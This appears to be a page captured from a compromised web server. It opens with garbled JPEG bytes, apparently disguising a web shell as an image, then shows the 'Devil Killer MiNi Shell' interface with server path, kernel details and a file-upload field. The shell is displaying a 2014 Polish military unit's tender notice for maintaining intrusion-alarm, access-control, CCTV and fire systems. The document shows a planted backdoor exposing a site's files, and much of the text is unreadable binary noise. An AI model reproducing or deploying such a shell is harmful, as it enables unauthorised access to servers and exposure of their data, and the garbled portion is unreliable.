JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/221491-N-2014.html

<p class="kh_header"><b>Bydgoszcz: KONSERWACJA ORAZ NAPRAWY SYSTEMÓW OCHRONY TECHNICZNEJ I PPOŻ</b><br>
<b>Numer ogłoszenia: 221491 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4246 , ul. Szubińska 2, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 378 97 81, faks 52 3782584.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: obrona (Jednostka Wojskowa).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA ORAZ NAPRAWY SYSTEMÓW OCHRONY TECHNICZNEJ I PPOŻ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
A)	usługa polegająca na okresowej konserwacji i naprawie Systemów Sygnalizacji Włamania i Napadu, Systemów Kontroli Dostępu, Telewizyjnego Systemu Nadzoru oraz śluz antynapadowych - zadania od Nr 1 do Nr 4. 
	Zamówienie obejmuje kompleksową konserwację i naprawę (w zależności 
od zadania) urządzeń wyżej wymienionych systemów, znajdujących się na terenie kompleksów mieszczących się przy ul. Szubińskiej 2 oraz Szubińskiej 105 
w Bydgoszczy, w zakresie i na zasadach szczegółowo określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ, oraz zgodnie 
z obowiązującymi przepisami.
	Dla zadania 1 oraz 2 - zakres usługi obejmuje wyłącznie okresową konserwację wyżej wymienionych systemów.
	Dla zadania 3 oraz 4 - zakres usługi obejmuje okresową konserwację 
oraz naprawę wyżej wymienionych systemów wraz zapewnieniem pogotowia serwisowego.	
B)	usługa polegająca na okresowej konserwacji i naprawie systemów sygnalizacji pożaru oraz systemu DSO - zadanie Nr 5 oraz Nr 6.
Zamówienie obejmuje kompleksową konserwację i naprawę (w zależności 
od zadania) urządzeń wyżej wymienionych systemów, znajdujących się na terenie kompleksu mieszczącego się przy ul. Szubińskiej 2 w Bydgoszczy, w zakresie 
i na zasadach szczegółowo określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ, oraz zgodnie z obowiązującymi przepisami.
Dla zadania 5 - zakres usługi obejmuje okresową konserwację oraz naprawę wyżej wymienionych systemów (za wyjątkiem jednego budynku będącego 
na gwarancji) wraz zapewnieniem pogotowia serwisowego.
Dla zadania 6 - zakres usługi obejmuje wyłącznie okresową konserwację wyżej wymienionych systemów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.60.00.00-1, 50.71.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium, przed upływem terminu składania ofert, w wysokości:
	- dla zadania nr 3 - 3.000,00 PLN (słownie: trzy tysiące złotych 00/100),
	- dla zadania nr 4 - 1.000,00 PLN (słownie: tysiąc złotych 00/100),
	- dla zadania nr 5 - 1.500,00 PLN (słownie: tysiąc pięćset złotych 00/100).
Dla zadania nr 1, 2, 6 - Zamawiający nie wymaga wniesienia wadium
2.	Wadium może być wnoszone w jednej lub kilku formach, określonych 
w art. 45 ust. 6 UPZP.
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, tj. NBP O/O Bydgoszcz - Nr konta 70 1010 1078 0091 3313 9120 0000 z adnotacją: WADIUM - SYSTEMY ALARMOWE - zadanie nr ...... - 
nr postępowania 021/OZ/PA/2014. Dopuszcza się wskazanie w adnotacji również pełnej nazwy postępowania ze wskazaniem jego numeru. 
4.	Dowód wniesienia wadium: 
1.	zaleca się dołączyć potwierdzenie przelewu pieniędzy na rachunek bankowy Zamawiającego - w formie oryginału lub kserokopii poświadczonej za zgodność 
z oryginałem przez osobę/y upoważnioną/e do reprezentowania Wykonawcy, zgodnie 
z formą reprezentacji, określoną w rejestrze sądowym lub innym dokumencie,
2.	należy dołączyć w formie oryginału w pozostałych formach określonych 
w art. 45 ust. 6 UPZP.
5.	Wadium pozostaje w dyspozycji Zamawiającego i będzie zwrócone 
lub zatrzymane, na zasadach i w trybie określonym w art. 46 UPZP.
6.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek bankowy wskazany przez Wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
A) 	spełniają warunki, określone na podstawie art. 22 ust. 1 UPZP, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj.: 
a.	dla zadania Nr 1, 2, 3, 4: 
	aktualną koncesję MSWiA na prowadzenie działalności gospodarczej 
w zakresie ochrony osób i mienia realizowanej w formie zabezpieczenia technicznego wydaną na podstawie ustawy z dn. 22.08.1997 r. o ochronie osób 
i mienia (Dz. U. z 2005r. Nr 145, poz. 1221 z późn. zm.),
b.  dla zadania Nr 1, 3, 5, 6: 
		aktualne świadectwo bezpieczeństwa przemysłowego min. III stopnia, stwierdzające, że jednostka (Wykonawca) posiada zdolność do zapewnienia ochrony informacji niejawnych oznaczonych klauzulą NATO SECRET wydane przez właściwą Służbę Ochrony Państwa,
c.	dla zadania Nr 4: 
		aktualne świadectwo bezpieczeństwa przemysłowego min. III stopnia, stwierdzające, że jednostka (Wykonawca) posiada zdolność do zapewnienia ochrony informacji niejawnych oznaczonych klauzulą POUFNE (lub wyższą) wydane przez właściwą Służbę Ochrony Państwa.
Ocena, czy Wykonawca spełnia postawione wyżej warunki udziału 
w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, 
na podstawie analizy załączonych do oferty dokumentów określonych 
w pkt. 11.1.2. SIWZ. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymienione wyżej warunki udziału w postępowaniu 
każdy z osobna.
2)	posiadania wiedzy i doświadczenia, tj.:
wykażą się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
co najmniej jednej usługi (w każdym z zakresów) trwającej nie krócej 
niż 6 miesięcy odpowiadającej swoim rodzajem usługom stanowiącym przedmiot zamówienia, tj.:
a.	dla zadania Nr 1, 3 oraz 4: 
w zakresie konserwacji:
a. 	systemu sygnalizacji i włamania klasy SA-4,
b. 	systemu monitoringu telewizji przemysłowej (telewizyjnego systemu nadzoru),
c. systemu kontroli dostępu, 
b.	dla zadania Nr 5: 
w zakresie konserwacji:
a. 	systemu oddymiania klatek schodowych,
b. 	systemu sygnalizacji pożaru - Schrack Seconet,
c. samoczynnego urządzenia gaśniczego,
c.	dla zadania Nr 6:
w zakresie konserwacji:
a. Dźwiękowego Systemu Ostrzegawczego.
W zakresie zadania nr 2 Zamawiający nie precyzuje warunku.
Ocena, czy Wykonawca spełnia postawiony wyżej warunek udziału 
w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, 
na podstawie analizy załączonych do oferty dokumentów określonych 
w pkt. 11.1.3. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymienione wyżej warunki udziału w postępowaniu łącznie.
Warunek uważa się za spełniony, jeśli każdy z ww. zakresów (dla zadania Nr 1, 3 oraz 4 - zakres a.a-a.c. lub dla zadania Nr 5 - zakres b.a.-b.c. lub dla zadania Nr 6 - zakres c.a.) zrealizowany został w jednym zamówieniu (w ramach jednej umowy) dla jednego podmiotu (lub zespołu podmiotów).
Dopuszcza się możliwość realizacji zakresów w ramach jednego zamówienia 
(w ramach jednej umowy) lub każdego z osobna. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
3)	dysponowania odpowiednim:
a.	potencjałem technicznym, tj.: Zamawiający nie precyzuje warunku,
b.	osobami zdolnymi do wykonania zamówienia, tj.:
a)	dla zadania Nr 1, 2, 3, 4, 5 i 6: 
co najmniej jedną osobą przewidzianą do wykonywania czynności wynikających z przedmiotu zamówienia w zakresie wglądu do dokumentacji powykonawczej oznaczonej klauzulą POUFNE, legitymującą się aktualnym poświadczeniem bezpieczeństwa upoważniającym do dostępu do informacji niejawnych oznaczonych klauzulą POUFNE,
b)	dla zadania Nr 1: 
co najmniej dwiema osobami przewidzianymi do wykonywania czynności wynikających z zakresu przedmiotu zamówienia legitymującymi się:
1.	aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu do informacji niejawnych oznaczonych klauzulą NATO SECRET 
wraz z zaświadczeniami o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228)
2.	aktualnymi legitymacjami kwalifikowanego pracownika zabezpieczenia technicznego oraz świadectwami ukończenia kursów w zakresie instalowania i konserwacji lub projektowania systemów alarmowych klasy SA4,

3.	uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne 
(Dz. U. z 2006 r. Nr 89, poz. 625 z późn. zm.) do wykonywania pracy 
w zakresie eksploatacji:
1.	urządzeń, instalacji i sieci elektroenergetycznych o napięciu 
nie wyższym niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń, instalacji i sieci automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828. 
c)	dla zadania Nr 2: 
co najmniej dwiema osobami przewidzianymi do wykonywania czynności wynikających z zakresu przedmiotu zamówienia legitymującymi się:
1.	aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu do informacji niejawnych oznaczonych klauzulą minimum ZASTRZEŻONE lub upoważnieniami do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE, wraz z zaświadczeniami 
o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228) 
2.	aktualnymi legitymacjami kwalifikowanego pracownika zabezpieczenia technicznego,
3.	uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne 
(Dz. U. z 2006 r. Nr 89, poz. 625 z późn. zm.) do wykonywania pracy 
w zakresie eksploatacji:
1.	urządzeń, instalacji i sieci elektroenergetycznych o napięciu 
nie wyższym niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń, instalacji i sieci automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828.
d)	dla zadania Nr 3: 
co najmniej dwiema osobami przewidzianymi do wykonywania czynności wynikających z zakresu przedmiotu zamówienia legitymującymi się:
1.	aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu do informacji niejawnych oznaczonych klauzulą NATO SECRET 
wraz z zaświadczeniami o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228)
2.	aktualnymi legitymacjami kwalifikowanego pracownika zabezpieczenia technicznego oraz świadectwami ukończenia kursów w zakresie instalowania i konserwacji lub projektowania systemów alarmowych klasy SA4,
3.	uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne 
(Dz. U. z 2006 r. Nr 89, poz. 625 z późn. zm.) do wykonywania pracy 
w zakresie eksploatacji:
1.	urządzeń, instalacji i sieci elektroenergetycznych o napięciu 
nie wyższym niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń, instalacji i sieci automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828. 
e. 	dla zadania Nr 4:
co najmniej czterema osobami przewidzianymi do wykonywania pozostałych czynności wynikających z zakresu przedmiotu zamówienia legitymującymi się:
1.	aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu 
do informacji niejawnych oznaczonych klauzulą:
 - ZASTRZEŻONE lub upoważnieniami do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE, wraz z zaświadczeniami 
o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228) - minimum 2 osoby, 
-	POUFNE wraz z zaświadczeniami o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 
5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228) - minimum 2 osoby.
2.	aktualnymi legitymacjami kwalifikowanego pracownika zabezpieczenia technicznego oraz świadectwami ukończenia kursów w zakresie instalowania i konserwacji lub projektowania systemów alarmowych SA4,
3.	uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne 
(Dz. U. z 2006 r. Nr 89, poz. 625 z późn. zm.) do wykonywania pracy 
w zakresie eksploatacji:
1.	urządzeń, instalacji i sieci elektroenergetycznych o napięciu 
nie wyższym niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń, instalacji i sieci automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828.
f. dla zadania Nr 5 oraz zadania Nr 6: 
co najmniej dwiema osobami przewidzianymi do wykonywania czynności wynikających z zakresu przedmiotu zamówienia legitymującymi się:

1.	aktualnymi poświadczeniami bezpieczeństwa upoważniającymi do dostępu do informacji niejawnych oznaczonych klauzulą NATO SECRET 
wraz z zaświadczeniami o przeszkoleniu z zakresu ochrony informacji niejawnych na podstawie art. 21 ust. 4 pkt 1 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r., Nr 182, poz. 1228)
2.	uprawnieniami (np. świadectwem kwalifikacyjnym SEP E) wymaganymi przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo Energetyczne 
(Dz. U. z 2006 r. Nr 89, poz. 625 z późn. zm.) do wykonywania pracy 
w zakresie eksploatacji:
1.	urządzeń, instalacji i sieci elektroenergetycznych o napięciu 
nie wyższym niż 1 kV,
2.	aparatury kontrolno-pomiarowej oraz urządzeń, instalacji i sieci automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych w ppkt. 1, zgodnie z rozporządzeniem Min. Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. Dz. U. nr 89 
poz. 828. 
Ocena, czy Wykonawca spełnia postawione wyżej warunki udziału 
w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, 
na podstawie analizy załączonych do oferty dokumentów określonych 
w pkt. 11.1.4. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie 
art. 23 UPZP, spełniają wymienione wyżej warunki udziału w postępowaniu łącznie.
Wykonawca może polegać na potencjale technicznym oraz osobach zdolnych 
do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
4)	sytuacji ekonomicznej i finansowej, tj.: Zamawiający nie precyzuje warunku,
Wykonawca zobowiązany jest ponadto do złożenia oświadczenia, iż w przypadku udzielenia mu zamówienia będzie posiadał ważne ubezpieczenie 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na minimalną sumę ubezpieczenia:
-	dla zadania nr 1 - 250.000,00 (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100) PLN,
-	dla zadania nr 3 - 250.000,00 (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100) PLN,
-	dla zadania nr 4 - 200.000,00 (słownie: dwieście tysięcy złotych 00/100) PLN,
-	dla zadania nr 5 - 250.000,00 (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100) PLN,
-	dla zadania nr 6 - 250.000,00 (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100) PLN,
przez cały okres realizacji zamówienia (oświadczenie w tym zakresie zawiera formularz ofertowy).



B)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie 
z art. 24 ust. 1 UPZP oraz ust. 2 pkt 5 UPZP.
Ocena, czy Wykonawca spełnia postawiony wyżej warunek, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, na podstawie analizy załączonych do oferty dokumentów określonych w pkt. 11.1.5. SIWZ.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 UPZP, spełniają wymieniony wyżej warunek zgodnie z zapisami pkt 11.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>określono w pkt III.3.1)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>określono w pkt III.3.1)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>określono w pkt III.3.1)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>określono w pkt III.3.1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
